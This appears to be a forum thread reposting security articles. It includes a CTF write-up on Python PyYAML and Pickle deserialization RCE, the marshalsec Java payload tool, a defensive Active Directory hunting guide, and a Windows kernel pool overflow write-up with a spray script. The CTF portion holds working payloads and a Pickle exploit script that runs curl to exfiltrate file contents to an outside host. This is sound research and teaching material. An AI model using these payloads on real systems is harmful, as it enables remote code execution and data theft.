-
Posts
18725 -
Joined
-
Last visited
-
Days Won
706
Posts posted by Nytro
-
-
Exploiting Python Deserialization Vulnerabilities
Over the weekend, I had a chance to participate in the ToorConCTF (https://twitter.com/toorconctf) which gave me my first experience with serialization flaws in Python. Two of the challenges we solved included Python libraries that appeared to be accepting serialized objects and ended up being vulnerable to Remote Code Execution (RCE). Since I struggled a bit to find reference material online on the subject, I decided to make a blog post documenting my discoveries, exploit code and solutions. In this blog post, I will cover how to exploit deserialization vulnerabilities in the PyYAML (a Python YAML library) and Python Pickle libraries (a Python serialization library). Let's get started!
Background
Before diving into the challenges, it's probably important to start with the basics. If you are unfamilliar with deserialization vulnerabilities, the following exert from @breenmachine at Fox Glove Security (https://foxglovesecurity.com) probably explains it the best.
"Unserialize vulnerabilities are a vulnerability class. Most programming languages provide built-in ways for users to output application data to disk or stream it over the network. The process of converting application data to another format (usually binary) suitable for transportation is called serialization. The process of reading data back in after it has been serialized is called unserialization. Vulnerabilities arise when developers write code that accepts serialized data from users and attempt to unserialize it for use in the program. Depending on the language, this can lead to all sorts of consequences, but most interesting, and the one we will talk about here is remote code execution."
PyYAML Deserialization Remote Code Execution
In the first challenge, we were presented with a URL to a web page which included a YAML document upload form. After Googling for YAML document examples, I crafted the following YAML file and proceeded to upload it to get a feel for the functionality of the form.
HTTP Request
POST / HTTP/1.1 Host: ganon.39586ebba722e94b.ctf.land:8001 User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://ganon.39586ebba722e94b.ctf.land:8001/ Connection: close Content-Type: multipart/form-data; boundary=---------------------------200783363553063815533894329 Content-Length: 857 -----------------------------200783363553063815533894329 Content-Disposition: form-data; name="file"; filename="test.yaml" Content-Type: application/x-yaml --- # A list of global configuration variables # # Uncomment lines as needed to edit default settings. # # Note this only works for settings with default values. Some commands like --rerun <module> # # or --force-ccd n will have to be set in the command line (if you need to) # # # This line is really important to set up properly # project_path: '/home/user' # # # The rest of the settings will default to the values set unless you uncomment and change them # #resize_to: 2048 'test' -----------------------------200783363553063815533894329 Content-Disposition: form-data; name="upload" -----------------------------200783363553063815533894329-- HTTP/1.1 200 OK Server: gunicorn/19.7.1 Date: Sun, 03 Sep 2017 02:50:16 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 2213 Set-Cookie: session=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/ <!-- begin message block --> <div class="container flashed-messages"> <div class="row"> <div class="col-md-12"> <div class="alert alert-info" role="alert"> test.yaml is valid YAML </div> </div> </div> </div> <!-- end message block --> </div> </div> <div class="container main" > <div class="row"> <div class="col-md-12 main"> <code></code>
As you can see, the document was uploaded successfully but only displayed whether the upload was a valid YAML document or not. At this point, I wasn't sure exactly what I was supposed to do, but after looking more closely at the response, I noticed that the server was running gunicorn/19.7.1...
A quick search for gunicorn revealed that it is a Python web server which lead me to believe the YAML parser was in fact a Python library. From here, I decided to search for Python YAML vulnerabilities and discovered a few blog posts referencing PyYAML deserialization flaws. It was here that I came across the following exploit code for exploiting PyYAML deserialization vulnerabilities. The important thing here is the following code which runs the 'ls' command if the application is vulnerable to PyYaml deserialization:
!!map { ? !!str "goodbye" : !!python/object/apply:subprocess.check_output [ !!str "ls", ], }
Going blind into the exploitation phase, I decided to give it a try and inject the payload into the document contents being uploaded using Burpsuite...
HTTP Request
POST / HTTP/1.1 Host: ganon.39586ebba722e94b.ctf.land:8001 User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://ganon.39586ebba722e94b.ctf.land:8001/ Connection: close Content-Type: multipart/form-data; boundary=---------------------------200783363553063815533894329 Content-Length: 445 -----------------------------200783363553063815533894329 Content-Disposition: form-data; name="file"; filename="test.yaml" Content-Type: application/x-yaml --- !!map { ? !!str "goodbye" : !!python/object/apply:subprocess.check_output [ !!str "ls", ], } -----------------------------200783363553063815533894329 Content-Disposition: form-data; name="upload" -----------------------------200783363553063815533894329-- <ul><li><code>goodbye</code> : <code>Dockerfile README.md app.py app.pyc bin boot dev docker-compose.yml etc flag.txt home lib lib64 media mnt opt proc requirements.txt root run sbin srv static sys templates test.py tmp usr var </code></li></ul>
As you can see, the payload worked and we now have code execution on the target server! Now, all we need to do is read the flag.txt...
I quickly discovered a limitaton of the above method was strictly limited to single commands (ie. ls, whoami, etc.) which meant there was no way to read the flag using this method. I then discovered that the os.system Python call could also be to achieve RCE and was capable of running multiple commands inline. However, I was quickly disasspointed after trying this and seeing that the result just returned "0" and I could not see my command output. After struggling to find the solution, my teamate @n0j pointed out that the os.system ["command_here" ] only returns a "0" exit code if the command is successful and is blind due to how Python handles sub process execution. It was here that I tried injecting the following command to read the flag: curl https://crowdshield.com/?`cat flag.txt`
HTTP Request
POST / HTTP/1.1 Host: ganon.39586ebba722e94b.ctf.land:8001 User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://ganon.39586ebba722e94b.ctf.land:8001/ Connection: close Content-Type: multipart/form-data; boundary=---------------------------200783363553063815533894329 Content-Length: 438 -----------------------------200783363553063815533894329 Content-Disposition: form-data; name="file"; filename="test.yaml" Content-Type: application/x-yaml --- "goodbye": !!python/object/apply:os.system ["curl https://crowdshield.com/?`cat flag.txt`"] -----------------------------200783363553063815533894329 Content-Disposition: form-data; name="upload" -----------------------------200783363553063815533894329-- </div> <div class="container main" > <div class="row"> <div class="col-md-12 main"> <ul><li><code>goodbye</code> : <code>0</code></li></ul> </div> </div> </div>
After much trial and error, the flag was ours along with 250pts in the CTF!
Remote Apache Logs
34.214.16.74 - - [02/Sep/2017:21:12:11 -0700] "GET /?ItsCaptainCrunchThatsZeldasFavorite HTTP/1.1" 200 1937 "-" "curl/7.38.0"
Python Pickle Deserialization
In the next CTF challenge, we were provided a host and port to connect to (ganon.39586ebba722e94b.ctf.land:8000). After initial connection however, no noticable output was displayed so I proceeded to fuzz the open port with random characters and HTTP requests to see what happened. It wasn't until I tried injecting a single "'" charecter that I received the error below:
# nc -v ganon.39586ebba722e94b.ctf.land 8000 ec2-34-214-16-74.us-west-2.compute.amazonaws.com [34.214.16.74] 8000 (?) open cexceptions AttributeError p0 (S"Unpickler instance has no attribute 'persistent_load'" p1 tp2 Rp3 .
The thing that stood out most was the (S"Unpickler instance has no attribute 'persistent_load'" portion of the output. I immediately searched Google for the error which revealed several references to Python's serialization library called "Pickle".
It soon became clear that this was likely another Python deserialization flaw in order to obtain the flag. I then searched Google for "Python Pickle deserialization exploits" and discovered a similar PoC to the code below. After tinkering with the code a bit, I had a working exploit that would send Pickle serialized objects to the target server with the commands of my choice.
Exploit Code
#!/usr/bin/python # Python Pickle De-serialization Exploit by 1N3@CrowdShield - https://crowdshield.com # import os import cPickle import socket import os # Exploit that we want the target to unpickle class Exploit(object): def __reduce__(self): # Note: this will only list files in your directory. # It is a proof of concept. return (os.system, ('curl https://crowdshield.com/.injectx/rce.txt?`cat flag.txt`',)) def serialize_exploit(): shellcode = cPickle.dumps(Exploit()) return shellcode def insecure_deserialize(exploit_code): cPickle.loads(exploit_code) if __name__ == '__main__': shellcode = serialize_exploit() print shellcode soc = socket.socket(socket.AF_INET,socket.SOCK_STREAM) soc.connect(("ganon.39586ebba722e94b.ctf.land", 8000)) print soc.recv(1024) soc.send(shellcode) print soc.recv(1024) soc.close()
Exploit PoC
# python python_pickle_poc.py cposix system p1 (S"curl https://crowdshield.com/rce.txt?`cat flag.txt`" p2 tp3 Rp4 .
Much to my surprise, this worked and I could see the contents of the flag in my Apache logs!
Remote Apache Logs
34.214.16.74 - - [03/Sep/2017:11:15:02 -0700] "GET /rce.txt?UsuallyLinkPrefersFrostedFlakes HTTP/1.1" 404 2102 "-" "curl/7.38.0"
Conclusion
So there you have it. Two practicle examples of Python serialization which can be used to obtain Remote Code Execution (RCE) in remote applications. I had a lot of fun competing in the CTF and learned a lot in the process, but due to other obligations time constraints I wasn't able to put my entire focus into the CTF. In the end, our team "SavageSubmarine" placed 7th overall with @hackerbyhobby, @baltmane and @n0j (http://n0j.github.io/). Till next time...
-1N3
Published by CrowdShield on 09/04/2017 [Blog Home]
Sursa: https://crowdshield.com/blog.php?name=exploiting-python-deserialization-vulnerabilities
-
Java Unmarshaller Security - Turning your data into code execution
Paper
It's been more than two years since Chris Frohoff and Garbriel Lawrence have presented their research into Java object deserialization vulnerabilities ultimately resulting in what can be readily described as the biggest wave of remote code execution bugs in Java history.
Research into that matter indicated that these vulnerabilities are not exclusive to mechanisms as expressive as Java serialization or XStream, but some could possibly be applied to other mechanisms as well.
This paper presents an analysis, including exploitation details, of various Java open-source marshalling libraries that allow(ed) for unmarshalling of arbitrary, attacker supplied, types and shows that no matter how this process is performed and what implicit constraints are in place it is prone to similar exploitation techniques.
Full paper is at marshalsec.pdf
Disclaimer
All information and code is provided solely for educational purposes and/or testing your own systems for these vulnerabilities.
Usage
Java 8 required. Build using maven
mvn clean package -DskipTests
. Run asjava -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]]
where
- -a - generates/tests all payloads for that marshaller
- -t - runs in test mode, unmarshalling the generated payloads after generating them.
- -v - verbose mode, e.g. also shows the generated payload in test mode.
- gadget_type - Identifier of a specific gadget, if left out will display the available ones for that specific marshaller.
- arguments - Gadget specific arguments
Payload generators for the following marshallers are included:
Marshaller Gadget Impact BlazeDSAMF(0|3|X) JDK only escalation to Java serialization
various third party libraries RCEsHessian|Burlap various third party RCEs Castor dependency library RCE Jackson possible JDK only RCE, various third party RCEs Java yet another third party RCE JsonIO JDK only RCE JYAML JDK only RCE Kryo third party RCEs KryoAltStrategy JDK only RCE Red5AMF(0|3) JDK only RCE SnakeYAML JDK only RCEs XStream JDK only RCEs YAMLBeans third party RCE -
Co-founder of Empire/BloodHound/Veil-Framework | PowerSploit developer | Microsoft PowerShell MVP | Security at the misfortune of others | http://specterops.ioSep 6
Hunting With Active Directory Replication Metadata
With the recent release of BloodHound’s ACL Attack Path Update as well as the work on Active Directory DACL backdooring by @_wald0 and myself (whitepaper here), I started to investigate ACL-based attack paths from a defensive perspective. Sean Metcalf has done some great work concerning Active Directory threat hunting (see his 2017 BSides Charm “Detecting the Elusive: Active Directory Threat Hunting” presentation) and I wanted to show how replication metadata can help in detecting this type of malicious activity.
Also, after this post had been drafted, Grégory LUCAND pointed out to me the extensive article (in French) he authored on the same subject area titled “Metadata de réplication et analyse Forensic Active Directory (fr-FR)”. He walks through detecting changes to an OU, as well as an excellent deep dive (deeper than this article) into how some of the replication components work such as linked value replication. I highly recommend you check his post out, even if you have to use Google Translate as I did :)
I’ll dive into some background concerning domain replication metadata and then will break down each ACL attack primitive and how you can hunt for these modifications. Unfortunately, replication metadata can be a bit limited, but it can at least help us narrow down the modification event that took place as well as the domain controller the event occurred on.
Note: all examples here use my test domain which runs at a Windows 2012 R2 domain functional level. Other functional domain versions will vary. Also, all examples were done in a lab context, so exact behavior in a real network will vary as well.
Active Directory Replication Metadata
When a change is made to a domain object on a domain controller in Active Directory, those changes are replicated to other domain controllers in the same domain (see the “Directory Replication” section here). As part of the replication process, metadata about the replication is preserved in two constructed attributes, that is, attributes where the end value is calculated from other attributes. These two properties are msDS-ReplAttributeMetaData and msDS-ReplValueMetaData.
Sidenote: previous work I found on replication metadata includes this article on tracking UPN modification as well as this great series of articles on different use cases for this data. These articles show how to use both REPADMIN /showobjmeta as well as the Active Directory cmdlets to enumerate and parse the XML formatted data returned. A few months ago, I pushed a PowerView commit that simplifies this enumeration process, and I’ll demonstrate these new functions throughout this post.
msDS-ReplAttributeMetaData
First off, how do we know which attributes are replicated? Object attributes are themselves represented in the forest schema and include a systemFlags attribute that contains various meta-settings. This includes the FLAG_ATTR_NOT_REPLICATED flag, which indicates that the given attribute should not be replicated. We can use PowerView to quickly enumerate all of these non-replicated attributes using a bitwise LDAP filter to check for this flag:
Get-DomainObject -SearchBase 'ldap://CN=schema,CN=configuration,DC=testlab,DC=local' -LDAPFilter '(&(objectClass=attributeSchema)(systemFlags:1.2.840.113556.1.4.803:=1))' | Select-Object -Expand ldapdisplayname
If we want attributes that ARE replicated, we can just negate the bitwise filter:
Get-DomainObject -SearchBase 'ldap://CN=schema,CN=configuration,DC=testlab,DC=local' -LDAPFilter '(&(objectClass=attributeSchema)(!systemFlags:1.2.840.113556.1.4.803:=1))' | Select-Object -Expand ldapdisplayname
So changes to any of the attributes in the above set on an object are replicated to other domain controllers, and, therefore, have replication metadata information in msDS-ReplAttributeMetaData (except for linked attributes, more on that shortly). Since this is a constructed attribute, we have to specify that the property be calculated during our LDAP search. Luckily, you can already do this with PowerView by specifying -Properties msDS-ReplAttributeMetaData for any of the Get-Domain* functions:
You can see that we get an array of XML text blobs that describes the modification events. PowerView’s brand new Get-DomainObjectAttributeHistory function will automatically query msDS-ReplAttributeMetaData for one or more objects and parse out the XML blobs into custom PSObjects:
Breaking down each result, we have the distinguished name of the object itself, the name of the replicated attribute, the last time the attribute was changed (LastOriginatingChange), the number of times the attribute has changed (Version), and the directory service agent distinguished name the change originated from (LastOriginatingDsaDN). The “Sidenote: Resolving LastOriginatingDsaDN” section at the end of this post shows how to resolve this distinguished name to the appropriate domain controller object itself. Unfortunately, we don’t get who made the change, or what the previous attribute value was; however, there are still a few interesting things things we can do with this data which I’ll show in a bit.
msDS-ReplValueMetaData
In order to understand msDS-ReplValueMetaData and why it’s separate from msDS-ReplAttributeMetaData, you need to understand linked attributes in Active Directory. Introduced Windows Server 2003 domain functional levels, linked value replication “allows individual values of a multivalued attribute to be replicated separately.” In English: attributes that are constructed/depend on other attributes were broken out in such a way that bits of the whole could be replicated one by one, instead of the entire grouping all at once. This was introduced in order to cut down on replication traffic in modern domain environments.
With linked attributes, Active Directory calculates the value of a given attribute, referred to as the back link, from the value of another attribute, referred to as the forward link. The best example of this is member / memberof for group memberships: the member property of a group is the forward link while the memberof property of a user is the backward link. When you enumerate the memberof property for a user, the backlinks are crawled to produce the final membership set.
There are two additional caveats about forward/backwards links you should be aware of. First, forward links are writable, while backlinks are not, so when a forward-linked attribute is changed the value of the associated backlink property is updated automatically. Second, because of this, only forward-linked attributes are replicated between domains, which then automatically calculate the backlinks. For more information, check out this great post on the subject.
A huge advantage for us is that because forward-linked attributes are replicated in this way, the previous values of these attributes are stored in replication metadata. This is exactly what the msDS-ReplValueMetaData constructed attribute stores, again in XML format. The new Get-DomainObjectLinkedAttributeHistory PowerView function wraps this all up for you:
We now know that member/memberof is a linked set, hence the modification results to member above.
In order to enumerate all forward-linked attributes, we can again examine the forest schema. Linked properties have a Link and LinkID in the schema — forward links have an even/nonzero value while back links have an odd/nonzero value. We can grab the current schema with [DirectoryServices.ActiveDirectory.ActiveDirectorySchema]::GetCurrentSchema() and can then use the FindAllClasses() method to enumerate all the current schema classes. If we filter by class properties that are even, we can find all linked properties that therefore have their previous values replicated in Active Directory metadata.
There are a lot of results here, but the main ones we likely care about are member/memberOf and manager/directReports, unfortunately. So member and manager are the only interesting properties for an object we can track previous modification values on. However, like with msDS-ReplAttributeMetaData, we unfortunately can’t see who actually initiated the change.
Hunting With Replication Metadata
Alright, so we have a bunch of this seemingly random replication metadata, how the hell do we actually use this to “find bad?” Metadata won’t magically tell you an entire story, but I believe it can start to point you in the right direction, with the added bonus of being pre-existing functionality already present in your domain. I’ll break down the process for hunting for each ACL attack primitive that @_wald0 and myself covered, but for most situations the process will be:
- Use Active Directory replication metadata to detect changes to object properties that might indicate malicious behavior.
- Collect detailed event logs from the domain controller linked to the change (as indicated by the metadata) in order to track down who performed the modification and what the value was changed to.
There’s one small exception to this process:
Group Membership Modification
This one is the easiest. The control relationship for this is the right to add members to a group (WriteProperty to Self-Membership) and the attack primitive through PowerView is Add-DomainGroupMember. Let’s see what the information from Get-DomainObjectLinkedAttributeHistory can tell us:
In the first entry, we see that ‘EvilUser’ was originally added (TimeCreated) at 21:13 and is still present (TimeDeleted == the epoch). Version being 3 means that the EvilUser was originally added at TimeCreated, deleted at some point, and then readded at 17:53 (LastOriginatingChange). Big note: these timestamps are in UTC!
In the second example, TestOUUser was added to the group at 21:12 (TimeCreated) and removed at 21:19 (TimeDeleted). The Version being even, as well as the non-epoch TimeDeleted value, means that this user is no longer present in the group and was removed at the indicated time. PowerView’s last new function, Get-DomainGroupMemberDeleted, will return just metadata components indicating deleted users:
If we want more details, we have the Directory System Agent (DSA) where the change originated, meaning the domain controller in this environment that handled the modification (PRIMARY here). Since we have the group that was modified (TestGroup) and the approximate time the change occurred (21:44 UTC), we can go to the domain controller that initiated the change (PRIMARY) to pull more event log detail (see the “Sidenote: Resolving LastOriginatingDsaDN” section for more detail on this process).
The auditing we really want isn’t on by default, but can be enabled with “Local Computer Policy -> Computer Configuration -> Windows Settings -> Security Settings -> Advanced Audit Policy Configuration -> Account Management -> Audit Security Group Management”:
This will result in event log IDs of 4735/4737/4755 for modifications to domain local, global, and universally scoped security groups:
We can see in the event detail that TESTLAB\dfm.a is the principal who initiated the change, with correlates with the deletion event we observed in the replication metadata.
User Service Principal Name Modification
This is also another interesting case. The vast majority of users will never have a service principal name (SPN) set unless the account is registered to… run a service. SPN modification is an attack primitive that I’ve spoken about before, and grants us a great opportunity to take advantage of the “Version” field of the metadata, i.e. the number of times a property has been modified.
If we set and then unset a SPN on a user, the Version associated with the attribute metadata will be even, indicating there used to be a value set:
If we enable the “Audit User Account Management” and “Audit Computer Account Management” settings, we can grab more detailed information about the changes:
The event ID will be 4738, but the event log detail unfortunately does not break out the value of servicePrincipalName on change. However, we do again get the principal who initiated the change:
Note the logged timestamp of the event matches the LastOriginatingChange of the replication metadata. If we wanted to do a mass enumeration of EVERY user account that had a SPN set and then deleted, we can use -LDAPFilter ‘(samAccountType=805306368)’ -Properties servicePrincipalName, and filtering out anything with an odd Version:
Object Owner/DACL Modification
I originally thought this scenario would be tough as well, as I had guessed that whenever delegation is changed on an OU those new rights were reflected in the ntSecurityDescriptor of any user objects down the inheritance chain. However, I was mistaken- any delegation changes are in the ntSecurityDescriptor of the OU/container, and I believe those inherited rights are calculated on LDAP enumeration by the server. In other words, the ntSecurityDescriptor of user/group/computer objects should only change when the owner is explicitly changed, or a new ACE is manually added to that object.
Since an object’s DACL and owner are both stored in ntSecurityDescriptor, and the event log data doesn’t provide details on the previous/changed value, we have no way of knowing if it was a DACL or owner based changed. However, we can still figure out who initiated the change again using event 4738:
Just like with SPNs, we can also sweep for any users (or other objects) that had their DACL or owner changed (i.e. Version > 1):
If we periodically enumerate all of this data for all users/other objects, we can start to timeline and calculate change deltas, but that’s for another post :)
User Password Reset
Unfortunately, this is probably the hardest scenario. Since password changes/resets are a fairly common occurrence, it’s difficult to reliably pull a pattern out of the data based solely on the password last set time. Luckily however, enabling the “Audit User Account Management” policy also produces event 4723 (a user changed their own password) and event 4724 (a password reset was initiated):
And we get the time of the reset, the user that was force-reset, and the principal that initiated it!
Group Policy Object Editing
If you’re able to track down a malicious GPO edit, and want to know the systems/users affected, I’ve talked about that process as well. However, this section will focus on trying to identify what file was edited and by whom.
Every time a GPO is modified, the versionNumber property is increased. So if we pull the attribute metadata concerning the last time versionNumber was modified, and correlate this time (as a range) with edits to all files and folders in the SYSVOL path we can identify the files that were likely modified by the last edit to the GPO. Here’s how we might accomplish that:
You can see above that the Groups.xml group policy preferences file was likely the file edited. To identify what user made the changes, we need to tweak “Local Computer Policy -> Computer Configuration -> Windows Settings -> Security Settings -> Advanced Audit Policy Configuration -> DS Access -> Audit Active Directory Service Changes”:
We can then comb for event IDs of 5136 to and use the alert data to narrow down the event that caused the versionNumber modification:
We see the distinguishedName of the GPO object being modified, as well as who initiated the change. There is some more information here in case you’re interested.
Sidenote: Resolving LastOriginatingDsaDN
As I previously mentioned, the LastOriginatingDsaDN property indicates the the last directory service agent that the given change originated from. For us to make the most use of this information, we want to map this particular DSA record back to the domain controller it’s running on. This is unfortunately a multi-step process, but I’ll walk you through it below using PowerView.
Say the change we want to track back is the following deleted Domain Admin member:
We see that the DSA distinguished name exists in the CN=Configuration container of the associated domain. We can retrieve the full object this references by using PowerView’s Get-DomainObject with the -SearchBase set to “ldap://CN=Configuration,DC=testlab,DC=local”:
We see above that this has a NTDS-DSA object category, and we see a serverreferencebl (backlink) property that points us in the right direction. If we resolve this new object DN, we get the following:
Now we see the actual domain controller distinguished name linked in the msdfsr-computerreference property of this new result, and the serverreference matches the LastOriginatingDsaDN from our initial result. This means we can skip that middle step and query for this ms-DFSR-Member object directory, linked by the serverreference attribute, by way of a custom LDAP filter. To finish, we can extract the msdfsr-computerreference property and resolve it to the actual domain controller object:
Success! \m/
Wrapup
Hopefully this causes at least a few people to think about the hunting/forensic possibilities from the Active Directory side. There’s a wealth of opportunity here to detect our ACL based attack components, as well as a myriad of other Active Directory “bad”. Also, observant readers may have noticed that I ignored an entire defensive component here, system access control lists (SACLs), which provide that chance to implement additional auditing. I’ll cover SACLs in a future post, showing how to utilize BloodHound to identify “key terrain” to place very specific SACL auditing rules.
Until then, have fun!
Originally published at harmj0y.
Sursa: https://posts.specterops.io/hunting-with-active-directory-replication-metadata-1dab2f681b19
-
Sharks in the Pool :: Mixed Object Exploitation in the Windows Kernel Pool
Sep 6, 2017
This year at Blackhat, I attended the Advanced Windows Exploitation (AWE) class. It’s a hands on class teaching Windows exploitation and whilst I’m relatively versed in usermode exploitation, I needed to get up to speed on windows kernel exploitation. If you haven’t taken the class, I encourage you too!
TL;DR
I explain a basic kernel pool overflow vulnerability and how you can exploit it by overwriting the TypeIndex after spraying the kernel pool with a mix of kernel objects.
Introduction
So, after taking the AWE course I really wanted to find and exploit a few kernel vulnerabilities. Whilst I think the HackSys Extreme Vulnerable Driver (HEVD) is a great learning tool, for me, it doesn’t work. I have always enjoyed finding and exploiting vulnerabilities in real applications as they present a hurdle that is often not so obvious.
Since that time I took the course, I have been very slowly (methodically, almost insanely) developing a windows kernel device driver fuzzer. Using this private fuzzer (eta wen publik jelbrek?), I found the vulnerability presented in this post. The technique demonstrated for exploitation is nothing new, but it’s slight variation allows an attacker to basically exploit any pool size. This blog post is mostly a reference for myself, but hopefully it benefits someone else attempting pool exploitation for the first time.
The vulnerability
After testing a few SCADA products, I came across a third party component called “WinDriver”. After a short investigation I realized this is Jungo’s DriverWizard WinDriver. This product is bundled and shipped in several SCADA applications, often with an old version too.
After installation, it installs a device driver named windrvr1240.sys to the standard windows driver folder. With some basic reverse engineering, I found several ioctl codes that I plugged directly into my fuzzers config file.
{ "ioctls_range":{ "start": "0x95380000", "end": "0x9538ffff" } }
Then, I enabled special pool using
verifier /volatile /flags 0x1 /adddriver windrvr1240.sys
and run my fuzzer for a little bit. Eventually finding several exploitable vulnerabilities, in particular this one stood out:kd> .trap 0xffffffffc800f96c ErrCode = 00000002 eax=e4e4e4e4 ebx=8df44ba8 ecx=8df45004 edx=805d2141 esi=f268d599 edi=00000088 eip=9ffbc9e5 esp=c800f9e0 ebp=c800f9ec iopl=0 nv up ei pl nz na pe cy cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010207 windrvr1240+0x199e5: 9ffbc9e5 8941fc mov dword ptr [ecx-4],eax ds:0023:8df45000=???????? kd> dd esi+ecx-4 805d2599 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4 805d25a9 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4 805d25b9 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4 805d25c9 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4 805d25d9 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4 805d25e9 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4 805d25f9 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4 805d2609 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4
That’s user controlled data stored in [esi+ecx] and it’s writing out-of-bounds of a kernel pool. Nice. On closer inspection, I noticed that this is actually a pool overflow triggered via an inline copy operation at loc_4199D8.
.text:0041998E sub_41998E proc near ; CODE XREF: sub_419B7C+3B2 .text:0041998E .text:0041998E arg_0 = dword ptr 8 .text:0041998E arg_4 = dword ptr 0Ch .text:0041998E .text:0041998E push ebp .text:0041998F mov ebp, esp .text:00419991 push ebx .text:00419992 mov ebx, [ebp+arg_4] .text:00419995 push esi .text:00419996 push edi .text:00419997 push 458h ; fized size_t +0x8 == 0x460 .text:0041999C xor edi, edi .text:0041999E push edi ; int .text:0041999F push ebx ; void * .text:004199A0 call memset ; memset our buffer before the overflow .text:004199A5 mov edx, [ebp+arg_0] ; this is the SystemBuffer .text:004199A8 add esp, 0Ch .text:004199AB mov eax, [edx] .text:004199AD mov [ebx], eax .text:004199AF mov eax, [edx+4] .text:004199B2 mov [ebx+4], eax .text:004199B5 mov eax, [edx+8] .text:004199B8 mov [ebx+8], eax .text:004199BB mov eax, [edx+10h] .text:004199BE mov [ebx+10h], eax .text:004199C1 mov eax, [edx+14h] .text:004199C4 mov [ebx+14h], eax .text:004199C7 mov eax, [edx+18h] ; read our controlled size from SystemBuffer .text:004199CA mov [ebx+18h], eax ; store it in the new kernel buffer .text:004199CD test eax, eax .text:004199CF jz short loc_4199ED .text:004199D1 mov esi, edx .text:004199D3 lea ecx, [ebx+1Ch] ; index offset for the first write .text:004199D6 sub esi, ebx .text:004199D8 .text:004199D8 loc_4199D8: ; CODE XREF: sub_41998E+5D .text:004199D8 mov eax, [esi+ecx] ; load the first write value from the buffer .text:004199DB inc edi ; copy loop index .text:004199DC mov [ecx], eax ; first dword write .text:004199DE lea ecx, [ecx+8] ; set the index into our overflown buffer .text:004199E1 mov eax, [esi+ecx-4] ; load the second write value from the buffer .text:004199E5 mov [ecx-4], eax ; second dword write .text:004199E8 cmp edi, [ebx+18h] ; compare against our controlled size .text:004199EB jb short loc_4199D8 ; jump back into loop
The copy loop actually copies 8 bytes for every iteration (a qword) and overflows a buffer of size 0x460 (0x458 + 0x8 byte header). The size of copy is directly attacker controlled from the input buffer (yep you read that right). No integer overflow, no stored in some obscure place, nada. We can see at 0x004199E8 that the size is attacker controlled from the +0x18 offset of the supplied buffer. Too easy!
Exploitation
Now comes the fun bit. A generic technique that can be used is the object TypeIndex overwrite which has been blogged on numerous occasions (see references) and is at least 6 years old, so I won’t go into too much detail. Basically the tl;dr; is that using any kernel object, you can overwrite the TypeIndex stored in the _OBJECT_HEADER.
Some common objects that have been used in the past are the Event object (size 0x40) and the IoCompletionReserve object (size 0x60). Typical exploitation goes like this:
- Spray the pool with an object of size X, filling pages of memory.
- Make holes in the pages by freeing/releasing adjacent objects, triggering coalescing to match the target chunk size (in our case 0x460).
- Allocate and overflow the buffer, hopefully landing into a hole, smashing the next object’s _OBJECT_HEADER, thus, pwning the TypeIndex.
For example, say if your overflowed buffer is size 0x200, you could allocate a whole bunch of Event objects, free 0x8 of them (0x40 * 0x8 == 0x200) and voilà, you have your hole where you can allocate and overflow. So, assuming that, we need a kernel object that is modulus with our pool size.
The problem is, that doesn’t work with some sizes. For example our pool size is 0x460, so if we do:
>>> 0x460 % 0x40 32 >>> 0x460 % 0x60 64 >>>
We always have a remainder. This means we cannot craft a hole that will neatly fit our chunk, or can we? There are a few ways to solve it. One way was to search for a kernel object that is modulus with our target buffer size. I spent a little time doing this and found two other kernel objects:
# 1 type = "Job" size = 0x168 windll.kernel32.CreateJobObjectW(None, None) # 2 type = "Timer" size = 0xc8 windll.kernel32.CreateWaitableTimerW(None, 0, None)
However, those sizes were no use as they are not modulus with 0x460. After some time testing/playing around, I relized that we can do this:
>>> 0x460 % 0xa0 0 >>>
Great! So 0xa0 can be divided evenly into 0x460, but how do we get kernel objects of size 0xa0? Well if we combine the Event and the IoCompletionReserve objects (0x40 + 0x60 = 0xa0) then we can achieve it.
The Spray
def we_can_spray(): """ Spray the Kernel Pool with IoCompletionReserve and Event Objects. The IoCompletionReserve object is 0x60 and Event object is 0x40 bytes in length. These are allocated from the Nonpaged kernel pool. """ handles = [] IO_COMPLETION_OBJECT = 1 for i in range(0, 25000): handles.append(windll.kernel32.CreateEventA(0,0,0,0)) hHandle = HANDLE(0) handles.append(ntdll.NtAllocateReserveObject(byref(hHandle), 0x0, IO_COMPLETION_OBJECT)) # could do with some better validation if len(handles) > 0: return True return False
This function sprays 50,000 objects. 25,000 Event objects and 25,000 IoCompletionReserve objects. This looks quite pretty in windbg:
